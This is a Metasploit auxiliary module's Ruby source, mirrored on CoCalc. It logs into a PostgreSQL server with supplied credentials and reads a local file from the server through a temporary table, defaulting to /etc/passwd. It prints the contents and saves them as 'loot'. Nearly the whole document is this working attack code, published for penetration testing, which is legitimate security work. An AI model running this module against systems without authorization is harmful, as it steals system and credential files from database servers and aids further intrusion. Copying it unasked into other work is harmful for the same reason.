CoCalc -- postgres

GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/auxiliary/admin/postgres/postgres_readfile.rb
¹⁹⁵⁰⁰ views
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Auxiliary
7
  include Msf::Exploit::Remote::Postgres
8
  include Msf::Auxiliary::Report
9
  include Msf::OptionalSession::PostgreSQL
10

11
  def initialize(info = {})
12
    super(
13
      update_info(
14
        info,
15
        'Name' => 'PostgreSQL Server Generic Query',
16
        'Description' => %q{
17
          This module imports a file local on the PostgreSQL Server into a
18
          temporary table, reads it, and then drops the temporary table.
19
          It requires PostgreSQL credentials with table CREATE privileges
20
          as well as read privileges to the target file.
21
        },
22
        'Author' => [ 'todb' ],
23
        'License' => MSF_LICENSE,
24
        'Notes' => {
25
          'Stability' => [CRASH_SAFE],
26
          'SideEffects' => [IOC_IN_LOGS, CONFIG_CHANGES],
27
          'Reliability' => []
28
        }
29
      )
30
    )
31

32
    register_options(
33
      [
34
        OptString.new('RFILE', [true, 'The remote file', '/etc/passwd'])
35
      ]
36
    )
37

38
    deregister_options('SQL', 'RETURN_ROWSET')
39
  end
40

41
  def rhost
42
    datastore['RHOST']
43
  end
44

45
  def rport
46
    datastore['RPORT']
47
  end
48

49
  def run
50
    self.postgres_conn = session.client if session
51
    ret = postgres_read_textfile(datastore['RFILE'])
52
    case ret.keys[0]
53
    when :conn_error
54
      print_error "#{rhost}:#{rport} Postgres - Authentication failure, could not connect."
55
    when :sql_error
56
      case ret[:sql_error]
57
      when /^C58P01/
58
        print_error "#{postgres_conn.peerhost}:#{postgres_conn.peerport} Postgres - No such file or directory."
59
        vprint_status "#{postgres_conn.peerhost}:#{postgres_conn.peerport} Postgres - #{ret[:sql_error]}"
60
      when /^C42501/
61
        print_error "#{postgres_conn.peerhost}:#{postgres_conn.peerport} Postgres - Insufficient file permissions."
62
        vprint_status "#{postgres_conn.peerhost}:#{postgres_conn.peerport} Postgres - #{ret[:sql_error]}"
63
      else
64
        print_error "#{postgres_conn.peerhost}:#{postgres_conn.peerport} Postgres - #{ret[:sql_error]}"
65
      end
66
    when :complete
67
      loot = ''
68
      ret[:complete].rows.each do |row|
69
        print_line(row.first)
70
        loot << row.first
71
      end
72
      # No idea what the actual ctype will be, text/plain is just a guess
73
      path = store_loot('postgres.file', 'text/plain', postgres_conn.peerhost, loot, datastore['RFILE'])
74
      print_good("#{postgres_conn.peerhost}:#{postgres_conn.peerport} Postgres - #{datastore['RFILE']} saved in #{path}")
75
      vprint_good "#{postgres_conn.peerhost}:#{postgres_conn.peerport} Postgres - Command complete."
76
    end
77
    postgres_logout if postgres_conn && session.blank?
78
  end
79
end
80

81
Product

Resources

Company
